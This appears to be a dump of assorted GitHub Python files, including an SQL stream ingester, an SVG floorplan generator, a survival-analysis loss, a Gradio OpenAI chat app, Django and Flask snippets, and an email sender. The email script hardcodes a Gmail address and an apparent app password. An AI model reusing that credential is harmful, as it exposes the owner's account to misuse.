pokestop_alert(self, pokestop_info):\n\t\tself.send_alert(self.pokestop, pokestop_info)\n\t\t\n\t#Trigger an alert based on Gym info\n\tdef gym_alert(self, gym_info):\n\t\tself.send_alert(self.gym, gym_info)","repo_name":"SilverLines/silverLines","sub_path":"alarms/FacebookPages/facebookpages_alarm.py","file_name":"facebookpages_alarm.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74118529764","text":"\nfrom utils.database import Database\nfrom utils.utils import Utils\n\n\nclass StreamIngester(Utils):\n\n def __init__(self, db_connection):\n\n self.db = Database(helpers_connection=db_connection)\n\n def add_target(self, target_data, table_name, output_schema, date_format):\n\n self.target_data = target_data\n\n self.table_name = table_name\n self.schema = output_schema\n\n date_cols = [x['column_name'] for x in self.db.execute_query(f\"\"\" SELECT column_name FROM information_schema.columns WHERE table_schema = '{output_schema}' AND table_name = '{table_name}' AND ( data_type ILIKE '%timestamp%' OR data_type ILIKE '%date%' ); \"\"\", return_object=True)]\n\n self.target_data, self.target_columns = Utils.add_missing_keys(self.target_data)\n\n self.column_names = ', '.join(['\"' + x + '\"' for x in self.target_columns])\n self.columns_insert = ', '.join(['%(' + x + ')s' if x not in [k for k in date_cols]\n else f\"TO_TIMESTAMP(%(\" + x + \")s, '\" + date_format + \"')\"\n for x in self.target_columns])\n\n self._ingest_target()\n\n def _ingest_target(self):\n\n self.db.execute_query(f\"\"\" INSERT INTO {self.schema}.{self.table_name}\n ({self.column_names})\n VALUES ({self.columns_insert})\n \"\"\", multiple=True,\n args=self.target_data)\n","repo_name":"danamlewis/open-aps-streaming","sub_path":"data-management-app/utils/stream_ingester.py","file_name":"stream_ingester.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26812197087","text":"#!/usr/bin/env python3\n\nimport xml.etree.ElementTree as ET\nimport yaml\nimport json\nimport sys\nimport re\nimport os\n\nspec = {}\n\ndef printLayers(root, show=[], hide=[], ns={'svg': 'http://www.w3.org/2000/svg','inkscape': 'http://www.inkscape.org/namespaces/inkscape'}, prefix=\"\", autoshow=False):\n if prefix:\n prefix += '/'\n for child in root.findall('./svg:g[@inkscape:groupmode=\"layer\"]', ns):\n label = prefix + child.get(f'{{{ns[\"inkscape\"]}}}label',\"\")\n if autoshow:\n if label in hide:\n child.set('style','display:none')\n print('Hide: ' + label)\n else:\n child.attrib.pop('style',None)\n print('Show: ' + label)\n else:\n if label in hide:\n child.set('style','display:none')\n print('Hide: ' + label)\n elif label in show or 'ALL' in show:\n child.attrib.pop('style',None)\n print('Show: ' + label)\n printLayers(child, show, hide, ns, prefix=label, autoshow=True)\n else:\n child.set('style','display:none')\n print('Hide: ' + label)\n\nif len(sys.argv) != 2:\n print('Usage: ' + sys.argv[0] + \" \")\n exit(1)\n\ntry:\n with open('layouts/' + sys.argv[1],'r') as file:\n spec = json.load(file) # load json specification\n print('Using json')\nexcept json.JSONDecodeError:\n with open('layouts/' + sys.argv[1],'r') as file:\n print('Using yaml')\n spec = yaml.safe_load(file) # load yaml specification\n\nwith open('templates/' + spec['image'],'r') as file:\n ns = dict([ node for _, node in ET.iterparse(file,events=['start-ns'])])\n\nfor prefix in ns:\n ET.register_namespace(prefix,ns[prefix])\n\nroot_tree = ET.parse('templates/' + spec['image']) # load svg\nroot = root_tree.getroot()\n\n\ntry: # set title and version\n root.find('.//svg:text[svg:tspan=\"{{title}}\"]', ns)[0].text = spec.get('title',spec['image'])\n root.find('.//svg:text[svg:tspan=\"{{version}}\"]', ns)[0].text = \"Version: \" + str(spec.get('version',0.1))\n root.find('.//svg:text[svg:tspan=\"{{scale}}\" ]', ns)[0].text = \"Scale 1:\" + str(spec.get('scale',1))\nexcept (IndexError,AttributeError,TypeError):\n pass\n\nwith open('team_names.txt','r') as file:\n team_names = yaml.safe_load(file)\n\nTLA = root.find('svg:g[@inkscape:label=\"TLA\"]',ns) # add team names\nif TLA:\n for team in TLA.findall('.//svg:text/svg:tspan',ns):\n team_no = re.search(r'@T_(\\d+)',team.text)\n if team_no:\n team.text = team_names.get(int(team_no[1]),'')\n\n# set scale\nold_width = root.get('width')[:-2]\nold_height = root.get('height')[:-2]\nroot.set('width',str(float(old_width)/spec.get('scale',1)) + \"cm\")\nroot.set('height',str(float(old_height)/spec.get('scale',1)) + \"cm\")\n\nprintLayers(root,spec.get('show',['ALL']),spec.get('hide',[]),ns=ns) # display only selected layers or ALL\n\nfor embedded in spec.get('embed',[]): # add nested svgs (including key)\n print(embedded['image'] + ':')\n embedded_root = ET.parse('templates/' + embedded['image']).getroot() # load svg\n \n TLA = root.find('svg:g[@inkscape:label=\"TLA\"]',ns) # add team names\n if TLA:\n for team in TLA.findall('.//svg:text/svg:tspan',ns):\n team_no = re.search(r'@T_(\\d+)',team.text)\n if team_no:\n team.text = team_names.get(int(team_no[1]),'')\n \n printLayers(embedded_root,embedded.get('show',['ALL']),embedded.get('hide',[]),ns=ns) # display only selected layers or ALL\n \n # add scaled at marker\n embed_parent = root.find('.//svg:rect[@id=\"{}\"]/..'.format(embedded['marker']), ns) # search for marker in id\n if embed_parent is None:\n print('Failed to insert ' + embedded['image'] + ' at ' + embedded['marker'])\n continue # exit(2)\n embed_child = embed_parent.find('./svg:rect[@id=\"{}\"]'.format(embedded['marker']), ns)\n embed_index = list(embed_parent).index(embed_child)\n embedded_root.set('x',embed_child.get('x')) # set x, y, height & width from marker\n embedded_root.set('y',embed_child.get('y'))\n embedded_root.set('width',embed_child.get('width'))\n embedded_root.set('height',embed_child.get('height'))\n embed_parent[embed_index] = embedded_root # replace element with svg\n\nif not os.path.exists('output'):\n os.mkdir('output')\n\nroot_tree.write('output/' + re.sub(r'\\s+','_',spec.get('title','output')) + '.svg',xml_declaration=True,encoding='UTF-8') # save to output\n","repo_name":"srobo/comp-floorplans","sub_path":"2019/generate_svg.py","file_name":"generate_svg.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9545044047","text":"import torch\nfrom pycox.models.utils import pad_col\nfrom torch import nn\nfrom pycox.models.loss import nll_logistic_hazard\n\nclass LossTDSurv(nn.Module):\n def __init__(self, alpha=0.5, beta=1.0):\n super().__init__()\n self.alpha = alpha\n self.beta = beta\n\n def event_time_loss(self, preds, idx_durations):\n \"\"\"\n Event time loss (Note: compute only for uncensored cases)\n \"\"\"\n h = preds[..., 0] # batch_size, time_step\n\n h_l = h.gather(1, idx_durations.unsqueeze(1)).view(-1) # batch_size\n h_padded = pad_col(h, where='start') # batch_size, time_step+1\n conditional_log_haz = torch.zeros_like(h)\n for i, idx in enumerate(idx_durations):\n conditional_log_haz[i, :idx] = torch.log(1 - h_padded[i, :idx])\n\n L_z = -(torch.log(h_l) + conditional_log_haz.sum(1))\n return torch.mean(L_z)\n\n def log_event_rate(self, preds, idx_durations):\n h = preds[..., 0] # batch_size, time_step\n\n h_padded = pad_col(h, where='start') # batch_size, time_step+1\n conditional_surv_log_prob = torch.zeros_like(h)\n for i, idx in enumerate(idx_durations):\n conditional_surv_log_prob[i, :idx] = torch.log(1 - h_padded[i, :idx])\n\n s = conditional_surv_log_prob.sum(1)\n event_rates = torch.clamp(1-s.exp(), min=1e-8)\n log_Wt = torch.log(event_rates)\n return log_Wt\n\n def log_survival_rate(self, preds, idx_durations):\n h = preds[..., 0] # batch_size, time_step\n\n h_padded = pad_col(h, where='start') # batch_size, time_step+1\n conditional_surv_log_prob = torch.zeros_like(h)\n for i, idx in enumerate(idx_durations):\n conditional_surv_log_prob[i, :idx] = torch.log(1 - h_padded[i, :idx])\n log_St = conditional_surv_log_prob.sum(1)\n return log_St\n\n def forward(self, preds, target=None):\n\n idx_durations, events = target.T\n idx_durations = idx_durations.long()\n\n L_z = self.event_time_loss(preds[events==1.0], idx_durations[events==1.0])\n\n c = 1.0 - events\n log_St = self.log_survival_rate(preds, idx_durations).squeeze()\n log_Wt = self.log_event_rate(preds, idx_durations).squeeze()\n L_c = -(c * log_St + (1 - c) * log_Wt).mean(dim=0).squeeze()\n\n def inverse_sigmoid(y):\n one_minus_y = (1-y) + 1e-12\n y_ = y + 1e-12\n return torch.log(y_ / one_minus_y)\n\n nll_loss = nll_logistic_hazard(inverse_sigmoid(preds[..., 0]), idx_durations.long(), events.float())\n\n # weighted average of L_z and L_c\n loss = (self.alpha * L_z) + ((1 - self.alpha) * L_c)\n loss += self.beta * nll_loss\n return loss\n","repo_name":"youhs4554/TRANS-TFI","sub_path":"baselines/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14344630732","text":"import smtplib , ssl\nfrom email.mime.text import MIMEText\nfrom email.utils import formataddr\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.base import MIMEBase\nfrom email import encoders\n\ndef send(reciever):\n sender_email = 'harry143lover@gmail.com'\n sender_name = 'SHRESTHA'\n\n # 'kotharisejal1998@gmail.com'\n reciever_email = reciever\n reciever_name = ''\n\n message_body = 'Your Analysis is completed and the Analysed image is attached below..'\n\n\n\n msg = MIMEMultipart()\n msg['To']= reciever_email\n msg['From']=sender_email\n msg['Subject'] = 'Analysed image ' +reciever_name\n\n msg.attach(MIMEText(message_body,'plain'))\n\n filename ='AnalysedImage.png'\n\n try:\n with open(filename,'rb') as attachment:\n part = MIMEBase(\"application\",\"octet-stream\")\n part.set_payload(attachment.read())\n\n #encode file to be sent by email.\n encoders.encode_base64(part)\n\n #add header as key value pair to attachment\n part.add_header('Content-Disposition', 'attachment',\n filename=filename )\n\n msg.attach(part)\n \n except Exception as e:\n print(f'oh no {e}') \n\n\n try:\n conn = smtplib.SMTP('smtp.gmail.com',587)\n\n # send internet traffic\n conn.ehlo()\n context = ssl.create_default_context()\n\n conn.starttls(context=context)\n conn.login(sender_email,'yjjvevhjgndifclw')\n\n conn.sendmail(sender_email,reciever_email,msg.as_string())\n except Exception as e:\n print(f'something bad happened!\\n {e}') \n finally:\n print('server is closing..')\n conn.quit()","repo_name":"ShresthaUpadhyay/SentimentAnalysis-with-emailing","sub_path":"sendMail.py","file_name":"sendMail.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20100958954","text":"from PyPDF2 import PdfReader\nimport gradio as gr\nimport openai\nimport os\n\n # The first line contains the OpenAI key, while the second line provides the OpenAI URL, which is useful when the OpenAI server is hidden behind a proxy server.\n # eg. first line \"sk-xxxxxxxxxx\", second line \"http://PROXY-URL\"\nif os.path.isfile('config'):\n config = open(\"config\").readlines()\nelse:\n config = \"\"\napi_key_from_config = \"\"\nif len(config) > 0 and len(config[0].strip()) > 0:\n api_key_from_config = config[0].strip()\nif len(config) > 1 and len(config[1].strip()) > 0:\n openai.api_base = config[1].strip()\n\n# config\nDEBUG = True\n\n'''\n gradio: [['first question', 'No'], ['second question', 'Yes']]\n openai: [{\"role\": \"user\", \"content\": \"first question\"}, {\"role\": \"assistant\", \"content\": \"No\"}\n {\"role\": \"user\", \"content\": \"second question\"}, {\"role\": \"assistant\", \"content\": \"Yes\"}]\n'''\ndef gradio_messages_to_openai_messages(g):\n result = []\n for pair in g:\n result.append({\"role\": \"user\", \"content\": pair[0]})\n result.append({\"role\": \"assistant\", \"content\": pair[1]})\n return result\n\ndef respond(chat_history, message, system_message, key_txt, url_txt, model, temperature):\n messages = [\n {\"role\": \"system\", \"content\": system_message},\n *gradio_messages_to_openai_messages(chat_history),\n {\"role\": \"user\", \"content\": message}\n ] \n openai.api_key = key_txt if key_txt else api_key_from_config\n if url_txt:\n openai.api_base = url_txt\n if DEBUG:\n print(\"messages:\", messages)\n print(\"model:\", model)\n print(\"temperature:\", temperature)\n completion = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n temperature=temperature,\n )\n if DEBUG:\n print(\"completion:\", completion)\n response = completion['choices'][0]['message']['content']\n result = chat_history + [[message, response]]\n return result\n\n# The parse_pdf function is responsible for parsing the text from a PDF file and using it as input for the OpenAI GPT model.\n# Parameters:\n# - prompt: The initial prompt for the GPT model.\n# - pdfs: The PDF files to be parsed.\n# - system_message: The initial system message for the GPT model.\n# - key_txt: The OpenAI API key.\n# - url_txt: The OpenAI API base URL.\n# - model: The GPT model to be used.\n# - temperature: The temperature for the GPT model's output.\ndef parse_pdf(prompt, pdfs, system_message, key_txt, url_txt, model, temperature):\n result = \"\"\n full_text = \"\"\n # Iterate over each PDF file\n for pdf in pdfs:\n print(\"parse: \", pdf)\n text = \"\"\n # Use PdfReader to read the PDF file\n reader = PdfReader(pdf.name)\n # Iterate over each page in the PDF file and extract the text\n for page in reader.pages:\n text = text + page.extract_text()\n # Add a separator between the text from different PDF files\n full_text += text + \"\\n----------\\n\"\n # Construct a list of messages for the GPT model\n messages = [\n {\"role\": \"system\", \"content\": system_message},\n {\"role\": \"user\", \"content\": prompt + \"\\n\\n###\\n\\n \" + full_text}\n ]\n # Set the OpenAI API key and base URL\n openai.api_key = key_txt if key_txt else api_key_from_config\n if url_txt:\n openai.api_base = url_txt\n if DEBUG:\n print(\"messages:\", messages)\n print(\"model:\", model)\n print(\"temperature:\", temperature)\n # Use the openai.ChatCompletion.create method to generate a response from the GPT model\n completion = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n temperature=temperature,\n )\n if DEBUG:\n print(\"completion:\", completion)\n # Extract the response from the completion\n response = completion['choices'][0]['message']['content']\n\n return response\n\nwith gr.Blocks() as demo:\n with gr.Tab(\"Config\"):\n with gr.Row():\n key_txt = gr.Textbox(label = \"Openai Key\", placeholder=\"Enter openai key 'sk-xxxx'%s\" %\n (\", Leave empty to use value from config file\" if api_key_from_config else \"\"))\n url_txt = gr.Textbox(label = \"Openai API Base URL\", placeholder=\"Enter openai base url 'https://xxx', Leave empty to use value '%s'\" % openai.api_base)\n system_message = gr.Textbox(label = \"System Message:\", value = \"You are an assistant who gives brief and concise answers.\")\n model = gr.Dropdown(label=\"Model\", choices=[\"gpt-3.5-turbo\", \"gpt-3.5-turbo-0301\", \"gpt-4\"], multiselect=False, value=\"gpt-3.5-turbo\", type=\"value\")\n temperature = gr.Slider(0, 2, value=1, label=\"Temperature\", step=0.1, info=\"What sampling temperature to use, between 0 and 2. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic.\")\n with gr.Tab(\"Chat\"):\n gr.Markdown(\"## Chat with GPT\")\n chatbot = gr.Chatbot()\n message = gr.Textbox(label = \"Message:\", placeholder=\"Enter text and press 'Send'\")\n message.submit(\n respond,\n [chatbot, message, system_message, key_txt, url_txt, model, temperature],\n chatbot,\n )\n with gr.Row():\n clear = gr.Button(\"Clear\")\n clear.click(lambda: None, None, chatbot)\n send = gr.Button(\"Send\")\n send.click(\n respond,\n [chatbot, message, system_message, key_txt, url_txt, model, temperature],\n chatbot,\n )\n with gr.Tab(\"PDF\"):\n gr.Markdown(\"## Parse PDF with GPT\")\n prompt = gr.Text(label=\"Prompt\")\n pdfs = gr.File(label=\"Upload PDF\", file_count=\"multiple\", file_types=[\".pdf\"])\n markdown = gr.Markdown(label=\"Output\")\n with gr.Row():\n clear = gr.Button(\"Clear\")\n clear.click(lambda: None, None, markdown)\n submit = gr.Button(\"Upload\")\n submit.click(\n parse_pdf,\n [prompt, pdfs, system_message, key_txt, url_txt, model, temperature],\n markdown\n )\n\n\nif __name__ == \"__main__\":\n demo.launch()\nelse:\n # run with \"gradio app.py\"\n demo.launch(server_name=\"0.0.0.0\")","repo_name":"simpx/chatdemo","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"52"} +{"seq_id":"6458451789","text":"n = int(input())\r\nc = 0\r\ns = 0\r\nlista = \"\"\r\nwhile True:\r\n if c == n: break\r\n x, y = map(int, input().split())\r\n if x > y:\r\n for i in range(y+1,x):\r\n if i%2==1:\r\n s+=i\r\n elif x < y:\r\n for i in range(x+1,y):\r\n if i%2==1:\r\n s+=i\r\n elif x == y:\r\n s=0\r\n lista += str(s)+'\\n'\r\n c+=1\r\n s=0\r\nprint(lista.rstrip())","repo_name":"Gefft3/ProblemasBeecrowd","sub_path":"beecrowd/1099.py","file_name":"1099.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"38072480419","text":"formula = input()\nstack = []\nresult = ''\n\n# 연산자 우선순위\ndef p(opr):\n if opr == '+' or opr == '-':\n return 1\n elif opr == '*' or opr == '/':\n return 2\n else:\n return 0\n\n\nfor i in formula:\n if i.isalpha():\n result += i\n continue\n if i == '(':\n stack.append(i)\n elif i == ')':\n while(True):\n if stack and stack[-1] != '(':\n result += stack.pop()\n else:\n stack.pop()\n break\n else:\n while(True):\n if stack and (p(stack[-1]) >= p(i)):\n result += stack.pop()\n else:\n stack.append(i)\n break\n\nwhile(True):\n if stack:\n result += stack.pop()\n else:\n break\n\nprint(result)","repo_name":"hyeonn/algorithm-study","sub_path":"baekjoon/postfix.py","file_name":"postfix.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"8196245592","text":"from django.shortcuts import render, redirect\nfrom .models import Page\nfrom task.models import Task\nfrom django.contrib.auth import authenticate, login as l\nfrom django.contrib import messages\nfrom django.urls import reverse\nfrom account.models import create_client_if_not_exist\nfrom support.settings import MOBILE_URL\nfrom account.models import Client\nfrom django.http import HttpResponse\n# Create your views here.\n\nwelcome_message = '''Для подключения бота необходимо указать логин в телеграмме и нажать кнопку \"Сохранить!\" '''\n\ndef get_script(request,site,lang):\n if(request.META['REMOTE_HOST']):\n print(request.META['REMOTE_HOST'])\n # create_client_if_not_exist(request.META['REMOTE_HOST'])\n #print(request.META['REMOTE_HOST'])\n try:\n cl = Client.objects.get(alias=site)\n context = {'site': site, 'lang': lang, 'mobile_url': MOBILE_URL, 'client_sign': cl.sign}\n return render(request,'script.js',context)\n except Exception as e:\n mes = str(e) \n print(mes)\n return HttpResponse('alert(\"%s\")' % mes)\n\n\ndef index(request):\n page = Page.objects.get(name_slug='index')\n tasks = []\n if request.user.is_authenticated:\n #tasks = Task.objects.filter(user=request.user).order_by('-is_active','-id')\n tasks = Task.objects.all().order_by('-is_active','-id')\n #if not request.user.profile.telegram_login:\n # messages.warning(request, welcome_message)\n # return redirect('profile')\n else:\n messages.warning(request, 'Нужно авторизоваться!')\n messages.success(request, 'Для входа используйте
гугл аккаунт' % reverse('social:begin', args=['google-oauth2']) )\n return render(request,'main/index.html',{'page': page, 'tasks': tasks})\n\n\n\ndef login(request):\n username = request.POST['login']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n l(request, user)\n return redirect('home')\n else:\n messages.warning(request, 'Error!!!!')\n return redirect('home')\n\ndef logoutme(request):\n logout(request)\n return redirect('home')\n","repo_name":"zdimon/support-ionic-django","sub_path":"support/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44565406046","text":"import os\nfrom datetime import datetime\nfrom config import db\nfrom models import Person, Note\n\n# Данные для инициализации базы данных\nPEOPLE = [\n {\n \"fname\": \"Doug\",\n \"lname\": \"Farrell\",\n \"notes\": [\n (\"Круто, приложение для мини-блогов!\", \"2019-01-06 22:17:54\"),\n (\"Это может быть полезно\", \"2019-01-08 22:17:54\"),\n (\"Ну вроде полезно\", \"2019-03-06 22:17:54\"),\n ],\n },\n {\n \"fname\": \"Kent\",\n \"lname\": \"Brockman\",\n \"notes\": [\n (\n \"Я собираюсь сделать действительно глубокие наблюдения\",\n \"2019-01-07 22:17:54\",\n ),\n (\n \"Может быть, они будут более очевидными, чем я думал\",\n \"2019-02-06 22:17:54\",\n ),\n ],\n },\n {\n \"fname\": \"Bunny\",\n \"lname\": \"Easter\",\n \"notes\": [\n (\"Кто-нибудь видел мои пасхальные яйца?\", \"2019-01-07 22:47:54\"),\n (\"Я действительно опоздал с доставкой!\", \"2019-04-06 22:17:54\"),\n ],\n },\n]\n\n# Удалите файл базы данных, если он существует в данный момент\nif os.path.exists(\"people.db\"):\n os.remove(\"people.db\")\n\n# Создание базы данных\ndb.create_all()\n\n# Выполните итерацию по структуре людей и заполните базу данных\nfor person in PEOPLE:\n p = Person(lname=person.get(\"lname\"), fname=person.get(\"fname\"))\n\n # Добавьте заметки для этого человека\n for note in person.get(\"notes\"):\n content, timestamp = note\n p.notes.append(\n Note(\n content=content,\n timestamp=datetime.strptime(timestamp, \"%Y-%m-%d %H:%M:%S\"),\n )\n )\n db.session.add(p)\n\ndb.session.commit()","repo_name":"thr4sh/flaskstuff","sub_path":"build_database.py","file_name":"build_database.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70585355364","text":"import logging\n\nimport ltr559\nfrom blinker import signal\n\n\nclass LTR559:\n def __init__(self, address):\n logging.info('Initialising LTR559 sensor with address {}'.format(address))\n self._sensor = ltr559.LTR559()\n\n def get_lux(self):\n \"\"\"\n Return measured lux from the sensor.\n\n :return:\n \"\"\"\n logging.debug('Measuring lux')\n lux = self._sensor.get_lux()\n logging.info('Broadcasting lux: {}'.format(lux))\n\n lux_signal = signal('lux')\n lux_signal.send(self, lux=lux)\n","repo_name":"dashford/sentinel","sub_path":"src/Devices/Sensors/LTR559.py","file_name":"LTR559.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43367893372","text":"import time\nimport numpy as np\nimport pandas as pd\nfrom implementations import all_implementations\n\ndef main():\n \"\"\" Comparing the performance of the seven sorting implementations given in the all_implementations array: \n qs1, qs2, qs3, qs4, qs5, merge1, partition_sort.\n\n \"\"\"\n data = pd.DataFrame(columns=['sort_type', 'run_time'])\n\n for i in range(0,400):\n random_array = np.random.randint(1, 1000, size=700)\n for sort in all_implementations:\n st = time.time()\n res = sort(random_array)\n en = time.time()\n data = data.append({'sort_type': str(sort.__name__), 'run_time': (en-st)}, ignore_index=True)\n\n \n # save data\n data.to_csv('data.csv', index=False)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"KayTheGuy/data-science-in-python","sub_path":"EX6/create_data.py","file_name":"create_data.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10399976977","text":"from selenium import webdriver\nimport pytest\nfrom selenium.webdriver.chrome.service import Service\n\n\n@pytest.fixture()\ndef setup():\n # s = Service(\"D:\\\\Automation\\\\chromedriver_win32\\\\chromedriver.exe\")\n # driver = webdriver.Chrome(service=s)\n driver = webdriver.Chrome(\"C:\\\\chromedriver.exe\")\n return driver\n\n# Pytest HTML Reporting\n\ndef pytest_configure(config):\n config._metadata['Project Name'] = 'QA Automation Framework Reporting'\n config._metadata['Module Name'] = 'Module Name Framework'\n config._metadata['Tester'] = 'M Mubeen'\n\n@pytest.mark.optionalhook\ndef pytest_metadata(metadata):\n metadata.pop(\"JAVA_HOME\", None)\n metadata.pop(\"Plugins\", None)","repo_name":"Muhammad-Mubeen/Quixel-Automation-Task","sub_path":"testCases/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27612878102","text":"# https://open.kattis.com/problems/dunglish\n# Time: 2022-09-09 10:07:41\n# title: Dunglish\n# language: Python 3\n\n\nn = int(input())\na = input().split()\nb = {}\nu = {}\nfor i in a:\n if i in b:\n b[i] += 1\n else:\n b[i] = 1\n u[i] = 0 \nm = int(input())\nc = []\ntrans = {}\ncor = 'correct'\nv = {}\nfor i in range(m):\n x,y,z = input().split()\n trans[x] = y\n c.append(x)\n if z == 'incorrect':\n cor = 'incorrect'\n else:\n if x in u:\n u[x] += 1\n \n if x in v:\n v[x] += 1\n else:\n v[x] = 1\n\nans1 = 1\nans2 = 1\nfor i in u:\n if i in b:\n ans1 *= u[i] ** b[i]\nfor i in v:\n if i in b:\n ans2 *= (v[i]) ** b[i]\nans2 -= ans1\n\nif ans1 == 1 and ans2 == 0:\n for i in a:\n print(trans[i], end=' ')\n print()\n print('correct')\nelif ans1 == 0 and ans2 == 1:\n for i in a:\n print(trans[i], end=' ')\n print()\n print('incorrect')\nelse:\n print(ans1, 'correct')\n print(ans2, 'incorrect')","repo_name":"mukerem/competitive-programming","sub_path":"kattis/dunglish.py","file_name":"dunglish.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"14400534221","text":"from __future__ import print_function\nfrom __future__ import division\nfrom . import C_\n\nimport bibtexparser\n\n###################################################################################################################################################\n\nclass Ref():\n\tdef __init__(self, name, entry_type, info_dict,\n\t\tinvalid_attrs=None,\n\t\tuses_arxiv_format=True,\n\t\t):\n\t\tself.name = name\n\t\tself.entry_type = entry_type\n\t\tself.info_dict = info_dict.copy()\n\t\tself.attrs = self.info_dict.keys() if invalid_attrs is None else [k for k in self.info_dict.keys() if not k in invalid_attrs]\n\t\tself.uses_arxiv_format = uses_arxiv_format\n\t\tself.arxiv_id = self.info_dict.get('arxivid', None) if self.uses_arxiv_format else None\n\t\tif not self.arxiv_id is None and 'journal' in info_dict.keys():\n\t\t\tself.info_dict.pop('journal')\n\t\t#print(self.arxiv_id)\n\n\tdef __repr__(self):\n\t\ttxt = '@'+self.entry_type+'{'+self.name+',\\n'\n\t\tfor attr in self.attrs:\n\t\t\tv = self.info_dict.get(attr, None)\n\t\t\tif v is None:\n\t\t\t\tcontinue\n\t\t\tv = v.replace('{', '').replace('}', '')\n\t\t\ttxt += attr+' = {'+v+'},\\n'\n\n\t\tif not self.arxiv_id is None:\n\t\t\ttxt += 'journal = {'+f'arXiv preprint arXiv:{self.arxiv_id}'+'},\\n'\n\n\t\ttxt += '}'\n\t\treturn txt\n\nclass RefsHandler():\n\tdef __init__(self, filedir,\n\t\tinvalid_attrs=None,\n\t\t):\n\t\tself.filedir = filedir\n\t\tself.refs = []\n\t\twith open(self.filedir) as bibtex_file:\n\t\t\tref_dict = bibtexparser.load(bibtex_file).entries_dict\n\t\t\tref_names = ref_dict.keys()\n\t\t\tfor ref_name in ref_names:\n\t\t\t\tid = ref_dict[ref_name].pop('ID')\n\t\t\t\tentry_type = ref_dict[ref_name].pop('ENTRYTYPE')\n\t\t\t\td = ref_dict[ref_name]\n\t\t\t\t#print(d)\n\t\t\t\tself.refs.append(Ref(id, entry_type, d, invalid_attrs))\n\n\tdef __repr__(self):\n\t\ttxt = ''\n\t\tfor ref in self.refs:\n\t\t\ttxt += str(ref)+'\\n'\n\t\treturn txt\n\n\tdef export(self, save_rootdir):\n\t\tsave_filedir = save_rootdir+'/'+self.filedir.split('/')[-1]\n\t\t#print(save_filedir)\n\t\tprint(self, file=open(save_filedir, 'w'))","repo_name":"oscarpimentel/latex-bib-handler","sub_path":"bibhandler/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6220037174","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# @Author: José Sánchez-Gallego (gallegoj@uw.edu)\n# @Date: 2020-08-01\n# @Filename: test_metadata.py\n# @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause)\n\nfrom sdsstools import get_metadata_files, get_package_version\n\n\ndef test_get_metadata_files(tmp_path):\n package_path = tmp_path / \"src\" / \"package\"\n package_path.mkdir(parents=True)\n\n init_path = package_path / \"__init__.py\"\n\n assert get_metadata_files(init_path) is None\n\n (tmp_path / \"setup.py\").touch()\n assert get_metadata_files(package_path) == str(tmp_path / \"setup.py\")\n assert get_metadata_files(tmp_path) == str(tmp_path / \"setup.py\")\n assert get_metadata_files(init_path) == str(tmp_path / \"setup.py\")\n\n (tmp_path / \"setup.cfg\").touch()\n assert get_metadata_files(init_path) == str(tmp_path / \"setup.cfg\")\n\n (tmp_path / \"pyproject.toml\").touch()\n assert get_metadata_files(init_path) == str(tmp_path / \"pyproject.toml\")\n\n\ndef test_get_package_version_path(tmp_path):\n package_path = tmp_path / \"src\" / \"package\"\n package_path.mkdir(parents=True)\n\n init_path = package_path / \"__init__.py\"\n\n assert get_package_version(path=init_path) is None\n\n setup_cfg = tmp_path / \"setup.cfg\"\n setup_cfg.touch()\n\n assert get_package_version(path=init_path) is None\n\n setup_cfg.write_text(\n \"\"\"\n[metadata]\nname = test-package\nversion = 0.4.6-alpha.0\n\"\"\"\n )\n\n assert get_package_version(path=init_path) == \"0.4.6-alpha.0\"\n assert get_package_version(path=init_path, pep_440=True) == \"0.4.6a0\"\n\n pyproject = tmp_path / \"pyproject.toml\"\n pyproject.write_text(\n \"\"\"\n[tool.poetry]\nname = \"sdsstools\"\nversion = \"0.2.2\"\n\"\"\"\n )\n\n assert get_package_version(path=init_path) == \"0.2.2\"\n\n\ndef test_get_package_version_name():\n assert get_package_version(package_name=\"pip\") is not None\n\n assert get_package_version(package_name=\"non-existing-package\") is 